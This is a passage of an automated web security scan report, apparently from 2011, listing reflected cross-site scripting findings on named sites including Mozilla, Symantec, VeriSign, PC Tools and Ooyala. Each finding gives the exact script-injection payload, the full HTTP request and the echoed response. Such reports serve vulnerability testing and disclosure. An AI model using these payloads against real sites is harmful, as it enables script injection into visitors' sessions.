Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d/openwebfund HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:59 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute91fb8<script>alert(1)</script>7f56fd6704d/openwebfund</p>
...[SNIP]...

3.9. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 63933<script>alert(1)</script>bf1b7d05258 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:15:01 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 391

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund63933<script>alert(1)</script>bf1b7d05258</p>
...[SNIP]...

3.10. https://donate.mozilla.org/page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 48171<script>alert(1)</script>2ff872bc181 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181=1 HTTP/1.1
Host: donate.mozilla.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: WT_FPC=id=50.23.123.106-1186922976.30162294:lv=1315481521865:ss=1315481112751

Response

HTTP/1.0 404 Not Found
Server: Apache
Content-Type: text/html; charset=ISO-8859-1
Date: Fri, 09 Sep 2011 22:14:56 GMT
Connection: Keep-Alive
Set-Cookie: X-CheckNode=; domain=donate.mozilla.org; path=/
Content-Length: 394

<html>
<head>
<title>Error 404</title>
</head>
<body>
<h1>Sorry, File Not Found: 404</h1>
<p>Invalid URL /page1166c%3Cscript%3Ealert(document.location)%3C/script%3E98501cf3ded/contribute/openwebfund?48171<script>alert(1)</script>2ff872bc181=1</p>
...[SNIP]...

3.11. https://fileconnect.symantec.com/licenselogin.jsp [localeStr parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://fileconnect.symantec.com
Path:   /licenselogin.jsp

Issue detail

The value of the localeStr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ba9ab"%3b528b7643cdb was submitted in the localeStr parameter. This input was echoed as ba9ab";528b7643cdb in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /licenselogin.jsp?localeStr=en_USba9ab"%3b528b7643cdb HTTP/1.1
Host: fileconnect.symantec.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:41:59 GMT
Content-length: 9332
Content-type: text/html;charset=UTF-8
Pragma: no-cache
Content-Language: en-US
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-store
Connection: close


<html>
<head>


<script language="JavaScript" src="javascript/common.js"></script>
<script language="JavaScript" src="javascript/calendar2.js"></script>
<
...[SNIP]...
and channel on the next lines. */

s.pageName    = "en/us: biz: FileConnect: Serial Number Input https://fileconnect.symantec.com/licenselogin.jsp?localeStr=en_US";    // set page name


s.prop2        = "USba9ab";528b7643cdb"    // set country
s.eVar27    = "USba9ab";528b7643cdb"

s.prop3        = "en"    // set language
s.eVar28    = "en"

s.prop27    = "Business";    // set Visitor Segment
s.eVar50    = "Business";
s.prop41    = "FileConne
...[SNIP]...

3.12. https://forms.verisign.com/websurveys/servlet/ActionMultiplexer [Action_ID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://forms.verisign.com
Path:   /websurveys/servlet/ActionMultiplexer

Issue detail

The value of the Action_ID request parameter is copied into the HTML document as plain text between tags. The payload 63579<script>alert(1)</script>6e92133b729 was submitted in the Action_ID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /websurveys/servlet/ActionMultiplexer?Action_ID=ACT200063579<script>alert(1)</script>6e92133b729&WSD_mode=3&WSD_surveyInfoID=943&toc=AAAAA-943-01-26&brand=01&country=26&oldToc=w29810323919638016&cid=47D9F8084F78B063 HTTP/1.1
Host: forms.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 80
Date: Fri, 09 Sep 2011 21:41:22 GMT

Missing or unknown action ID: ACT200063579<script>alert(1)</script>6e92133b729

3.13. http://free.pctools.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e810"><script>alert(1)</script>d4356c76675 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.ico5e810"><script>alert(1)</script>d4356c76675 HTTP/1.1
Host: free.pctools.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: reftrack=freesite%2320110909170147; PHPSESSID=68o0726o7nflfg28ire9iju5j2; __utma=9079138.240734855.1315623957.1315623957.1315623957.1; __utmb=9079138.1.10.1315623957; __utmc=9079138; __utmz=9079138.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1056361608.1315623957.1315623957.1315623957.1; __utmb=1.0.10.1315623957; __utmc=1; __utmz=1.1315623957.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName

Response (redirected)

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 22:05:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 22:05:59 GMT
Content-Length: 8247
Connection: close
Vary: Accept-Encoding
Set-Cookie: reftrack=freesite%2320110909170147%7Cdeleted%2320110909170223; expires=Sat, 08-Sep-2012 21:02:24 GMT; path=/; domain=.pctools.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Get PC Tools AntiVi
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/favicon.ico5e810"><script>alert(1)</script>d4356c76675/">
...[SNIP]...

3.14. http://free.pctools.com/free-antivirus/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /free-antivirus/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36661"><script>alert(1)</script>55a70ea0c85 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /free-antivirus36661"><script>alert(1)</script>55a70ea0c85/ HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.3.4
Content-Type: text/html; charset=UTF-8
Expires: Fri, 09 Sep 2011 21:42:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 09 Sep 2011 21:42:03 GMT
Content-Length: 8274
Connection: close
Set-Cookie: reftrack=freesite%2320110909163826; expires=Sat, 08-Sep-2012 20:38:28 GMT; path=/; domain=.pctools.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Get PC Tools AntiVi
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus36661"><script>alert(1)</script>55a70ea0c85/">
...[SNIP]...

3.15. http://free.pctools.com/free-antivirus/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://free.pctools.com
Path:   /free-antivirus/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fde3"><script>alert(1)</script>f1a4218a279 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279=1 HTTP/1.1
Host: free.pctools.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.3.4
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 09 Sep 2011 21:42:02 GMT
Date: Fri, 09 Sep 2011 21:42:02 GMT
Content-Length: 17979
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
   <title>Free AntiVirus & An
...[SNIP]...
<form method="POST" style="margin: 0; padding: 10px 16px 0 0;" action="/free-antivirus/?7fde3"><script>alert(1)</script>f1a4218a279=1">
...[SNIP]...

3.16. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32d94'-alert(1)-'503da824579 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /toolbar/activate.v?32d94'-alert(1)-'503da824579=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 7303
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<script type="text/javascript">
$(document).ready(function(){
$('#kaptchaRefresh').click(function(event) { $('#kaptchaImage').hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()*100)).fadeIn(); });
$('#kaptchaImage').click(function (event) { $(this).hide().attr('src', '/kaptcha.jpg?32d94'-alert(1)-'503da824579=1?' + Math.floor(Math.random()
...[SNIP]...

3.17. https://idprotect.verisign.com/toolbar/activate.v [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/activate.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3603"><script>alert(1)</script>2c6cb160cb7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/activate.v?b3603"><script>alert(1)</script>2c6cb160cb7=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: idprotect.verisign.com
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:47:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 7348
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<img id="kaptchaImage" src="/kaptcha.jpg?b3603"><script>alert(1)</script>2c6cb160cb7=1" alt="Click for a different one!" title="Click for a different one!" />
...[SNIP]...

3.18. https://idprotect.verisign.com/toolbar/download.v [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/download.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa418"><script>alert(1)</script>feea2f12a5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/download.v?fa418"><script>alert(1)</script>feea2f12a5=1 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/home.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html
Content-Length: 6622
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
iv tabindex="0" style="cursor:pointer;padding-top:10px;" onkeydown="if ((event.which &amp;&amp; event.which == 13) || (event.keyCode &amp;&amp; event.keyCode == 13)) {location.href='/toolbar/install.v?fa418"><script>alert(1)</script>feea2f12a5=1'}" onclick="location.href='/toolbar/install.v?fa418">
...[SNIP]...

3.19. https://idprotect.verisign.com/toolbar/home.v [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/home.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 141ab"><script>alert(1)</script>41143d22db1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/home.v?141ab"><script>alert(1)</script>41143d22db1=1 HTTP/1.1
Host: idprotect.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 09 Sep 2011 21:42:08 GMT
Content-Type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<div tabindex="0" style="cursor:pointer;" onclick="location.href='/toolbar/download.v?141ab"><script>alert(1)</script>41143d22db1=1'" onkeydown="if ((event.which &amp;&amp; event.which == 13) || (event.keyCode &amp;&amp; event.keyCode == 13)) {location.href='/toolbar/download.v?141ab">
...[SNIP]...

3.20. https://idprotect.verisign.com/toolbar/install.v [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /toolbar/install.v

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e6ab"><script>alert(1)</script>b6843a60d67 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /toolbar/install.v?2e6ab"><script>alert(1)</script>b6843a60d67=1 HTTP/1.1
Host: idprotect.verisign.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://idprotect.verisign.com/toolbar/download.v
Cookie: JSESSIONID=B9C7C9F0BB0FA2EAFB424CDD517510A3.moped1be-d1-tc

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:47:52 GMT
Content-Type: text/html
Content-Length: 6866
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
...[SNIP]...
<a id="download" href="/toolbar/downloadIE.v?2e6ab"><script>alert(1)</script>b6843a60d67=1">
...[SNIP]...

3.21. http://mbox3.offermatica.com/m2/verisign/mbox/standard [mbox parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mbox3.offermatica.com
Path:   /m2/verisign/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9179f<script>alert(1)</script>b30639e2275 was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/verisign/mbox/standard?mboxHost=www.verisign.com&mboxSession=1315621455064-973488&mboxPC=1315621455064-973488.19&mboxPage=1315621506825-922680&mboxXDomain=enabled&mboxCount=1&protocol=http%3A&serverDomain=www.verisign.com&referrer=none&mbox=VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275&mboxId=0&mboxURL=http%3A//www.verisign.com/&mboxReferrer=&mboxVersion=31 HTTP/1.1
Host: mbox3.offermatica.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mboxPC=1315621455064-973488.19

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315621455064-973488.19; Domain=offermatica.com; Expires=Sun, 09-Oct-2011 21:26:45 GMT; Path=/m2/verisign
Content-Type: text/javascript
Content-Length: 195
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Test & Target

mboxFactoryDefault.get('VRSN_HP_AccBox_20119179f<script>alert(1)</script>b30639e2275',0).setOffer(new mboxOfferDefault()).loaded();mboxFactoryDefault.getPCId().forceId("1315621455064-973488.19");

3.22. http://player.ooyala.com/player.js [playerId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the playerId request parameter is copied into a JavaScript rest-of-line comment. The payload dbef4%0aalert(1)//8baddfff4b was submitted in the playerId parameter. This input was echoed as dbef4
alert(1)//8baddfff4b
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69dbef4%0aalert(1)//8baddfff4b&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:29 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-17d1a37b
X-Pad: avoid browser bug
Content-Length: 26426
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:30 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
"class":"OoyalaVideoPlayer",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer_44h86_g6tvkk69dbef4
alert(1)//8baddfff4b
",a,d,"transparent","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<
...[SNIP]...

3.23. http://player.ooyala.com/player.js [wmode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://player.ooyala.com
Path:   /player.js

Issue detail

The value of the wmode request parameter is copied into a JavaScript rest-of-line comment. The payload 61651%0aalert(1)//96a754f882a was submitted in the wmode parameter. This input was echoed as 61651
alert(1)//96a754f882a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent61651%0aalert(1)//96a754f882a HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 09 Sep 2011 21:26:35 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-fa51be9b
X-Pad: avoid browser bug
Content-Length: 26322
Cache-Control: private, max-age=300
Date: Fri, 09 Sep 2011 21:26:35 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var R=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
Player",data:T};},getEmbedParams:function(T,i){return{allowScriptAccess:"always",allowFullScreen:"true",bgcolor:"#000000",wmode:T,flashvars:i};}};A.init("ooyalaPlayer235820917_10kbk3k",a,d,"transparent61651
alert(1)//96a754f882a
","http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf","http",o,F,m,j,B);}else{var N=e.createContainerDiv(q+"_InstallFlash",a,d,B);N.innerHTML='<table width="'+a+'
...[SNIP]...

3.24. https://press.verisign.com/easyir/customrel.do [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /easyir/customrel.do

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 11807--><script>alert(1)</script>5053ee4c92a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /easyir/customrel.do?11807--><script>alert(1)</script>5053ee4c92a=1 HTTP/1.1
Host: press.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
